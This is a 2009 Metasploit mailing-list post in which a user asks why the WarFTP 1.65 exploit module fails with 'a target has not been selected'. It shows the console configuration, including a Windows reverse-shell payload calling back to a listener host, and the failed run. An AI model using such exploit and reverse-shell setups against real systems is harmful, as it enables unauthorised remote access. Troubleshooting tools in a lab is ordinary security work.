Metasploit mailing list archives

Exploit failed: a target has not been selected

From: Jun Koi <junkoi2004 () gmail com>
Date: Wed, 28 Oct 2009 17:15:58 +0900

Hi,

I am running WarFtp 1.65 on Windows, and trying to exploit that with
the latest metasploit (SVN).
But I have the error "Exploit failed: a target has not been selected",
for no clear reason.

Any clue on how to fix this?

The result of "show options" seems to show that I use metasploit
correctly, like below.

Thanks,
Jun

-----
msf exploit(warftpd_165_user) > show options

Module options:

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla () example com  no        The password for the
specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST    10.0.0.5             yes       The target address
   RPORT    21                   yes       The target port

Payload options (windows/shell/reverse_nonx_tcp):

   Name      Current Setting  Required  Description
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     10.0.0.2         yes       The local address
   LPORT     4444             yes       The local port

msf exploit(warftpd_165_user) > exploit

[-] Exploit failed: A target has not been selected.
[*] Exploit completed, but no session was created.
msf exploit(warftpd_165_user) >